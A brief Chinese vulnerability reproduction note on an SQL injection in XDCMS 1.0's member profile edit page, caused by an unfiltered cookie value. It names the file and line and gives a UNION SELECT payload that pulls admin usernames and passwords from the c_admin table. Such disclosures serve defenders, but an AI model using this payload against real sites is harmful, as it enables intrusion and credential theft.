# XDCMS 1.0 sql注入漏洞(二)
===========================
一、漏洞简介
————
二、漏洞影响
————
XDCMS 1.0
三、复现过程
————
漏洞存在于用户资料修改页面,URL:`index.php?m=member&f=edit`
![](/static/qingy/XDCMS_1.0_sql注入漏洞(二)/img/rId24.jpg)
漏洞文件位于`system/modules/member/index.php`,`line:178`
![](/static/qingy/XDCMS_1.0_sql注入漏洞(二)/img/rId25.jpg)
\$userid直接从Cookie中取出,并无任何过滤,导致注入
![](/static/qingy/XDCMS_1.0_sql注入漏洞(二)/img/rId26.jpg)
select * from table_member where ‘userid’=-4 Union seLect 1,2,username,4,5,6,7,8,9,10,11,12,password,14,15 fRom c_admin
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容